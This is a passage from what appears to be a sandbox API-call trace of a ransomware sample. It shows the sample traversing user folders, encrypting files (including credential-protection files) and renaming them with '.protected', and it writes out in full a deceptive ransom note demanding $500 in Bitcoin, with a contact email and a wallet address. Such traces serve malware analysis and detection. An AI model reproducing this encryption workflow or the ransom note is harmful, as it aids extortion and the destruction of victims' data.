(in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.311] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.312] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.312] CloseHandle (hObject=0xd8) returned 1 [0090.312] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="Windows") returned -1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="Program Files") returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="Program Files (x86)") returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="$Recycle.bin") returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="System Volume Information") returned -1 [0090.312] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof") returned 65 [0090.312] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0090.312] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0090.312] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned 67 [0090.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.313] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0090.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.313] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\.") returned 67 [0090.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.313] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.313] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.313] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.313] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\..") returned 68 [0090.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.313] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.313] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.314] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\RESTORE_FILES.txt") returned 83 [0090.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 
[0090.314] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.314] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.315] lstrlenA (lpString="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") returned 684 [0090.315] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, 
lpOverlapped=0x0) returned 1 [0090.315] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.315] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.315] CloseHandle (hObject=0xd8) returned 1 [0090.316] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="Windows") returned -1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="Program Files") returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="Program Files (x86)") returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="$Recycle.bin") returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="System Volume Information") returned -1 [0090.316] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect") returned 67 [0090.316] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0090.316] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0090.316] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 69 [0090.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.316] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.316] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.316] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\.") returned 69 [0090.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.316] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.316] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.316] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.316] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.317] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.317] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.317] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.317] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.317] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.317] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.317] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\..") returned 70 [0090.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.317] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.317] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.317] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.317] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.317] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="Windows") returned -1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files") returned -1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files (x86)") returned -1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="$Recycle.bin") returned 1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="System Volume Information") returned -1 [0090.317] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.317] StrStrIW (lpFirst="CREDHIST", lpSrch=".protected") returned 0x0 [0090.317] lstrcmpW (lpString1="CREDHIST", lpString2="RESTORE_FILES.txt") returned -1 [0090.317] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.317] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.318] StrStrW 
(lpFirst="CREDHIST", lpSrch=".txt") returned 0x0 [0090.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.318] StrStrW (lpFirst="CREDHIST", lpSrch=".rar") returned 0x0 [0090.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.318] StrStrW (lpFirst="CREDHIST", lpSrch=".zip") returned 0x0 [0090.318] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.319] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.319] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.319] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.319] CloseHandle (hObject=0x14c) returned 1 [0090.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected") returned 86 [0090.319] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.protected")) returned 1 [0090.320] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.320] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Windows") returned -1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files") returned 1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files (x86)") returned 1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="$Recycle.bin") returned 1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="System Volume Information") returned -1 [0090.321] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned 113 [0090.321] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0090.321] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0090.321] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned 115 [0090.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.329] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.329] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.329] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.329] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.") returned 115 [0090.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.329] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.329] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.329] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.329] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.330] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.330] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\..") returned 116 [0090.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.330] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.330] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.330] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.330] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.330] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Windows") returned -1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files") returned -1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files (x86)") returned -1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="$Recycle.bin") returned 1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="System Volume Information") returned -1 [0090.330] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.330] StrStrIW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".protected") returned 0x0 [0090.330] lstrcmpW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="RESTORE_FILES.txt") returned -1 [0090.330] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.330] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.331] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".txt") returned 0x0 [0090.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.331] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".rar") returned 0x0 [0090.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.331] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".zip") returned 0x0 [0090.331] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.332] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.332] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.332] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.332] 
WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.332] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.332] CloseHandle (hObject=0x150) returned 1 [0090.333] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected") returned 160 [0090.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected" (normalized: "c:\\users\\5p5nrgjn0js 